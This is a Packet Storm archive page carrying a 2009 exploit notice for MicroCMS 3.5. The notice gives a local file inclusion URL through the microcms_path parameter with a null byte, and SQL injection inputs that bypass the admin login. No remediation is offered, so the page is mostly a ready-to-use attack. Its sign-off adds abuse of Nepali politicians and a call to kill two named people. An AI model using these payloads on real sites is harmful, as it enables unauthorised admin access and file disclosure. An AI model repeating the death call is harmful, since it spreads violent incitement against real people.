what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

MicroCMS 3.5 LFI / SQL Injection

MicroCMS 3.5 LFI / SQL Injection
Posted Sep 16, 2009
Authored by learn3r

MicroCMS version 3.5 suffers from remote SQL injection and local file inclusion vulnerabilities.

tags | exploit, remote, local, vulnerability, sql injection, file inclusion
SHA-256 | bbd4f0f777596d8f98c2e539870202f975f9c0262ea8d1a0b6fce2e8b4684af7

MicroCMS 3.5 LFI / SQL Injection

Change Mirror Download
#################################################
# Micro CMS File inclusion Vuln #
# Micro CMS SQLi login bypass #
# By learn3r hacker from Nepal #
# damagicalhacker@gmail.com #
#################################################

Affected version: v 3.5 or may be lower...

#############################################
# File Inclusion Vuln #
#############################################

Requires register globals to be on...

Vuln file: microcms-inlude.php
http://localhost/exploit/microcms/micro_cms_files/microcms-include.php?microcms_path=[FileInclusion]%00


#############################################
# SQLi Login Bypass #
#############################################

Vuln file: microcms-admin-login.php

Username: valid_username/* [eg. admin/*]
Password: learn3r [or whatever]

Or Username: " or 1=1/*
Password: learn3r [or whatever]



Greetz to: sToRm and m0nkee from #gny, sam207 from www.sampctricks.blogspot.com, nepali boka, l@d0_put! HaCKeR and all...
FuCK MaKuNe, G!r!ja, Prachanda and all political leaders of Nepal
K!ll Upendra Yadav and Vijay Gachhedhaar

By learn3r aka cyb3r lord
Nepali Hackerz Are Not Dead!!!


Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    0 Files
  • 5
    Sep 5th
    0 Files
  • 6
    Sep 6th
    0 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    0 Files
  • 9
    Sep 9th
    0 Files
  • 10
    Sep 10th
    0 Files
  • 11
    Sep 11th
    0 Files
  • 12
    Sep 12th
    0 Files
  • 13
    Sep 13th
    0 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    0 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close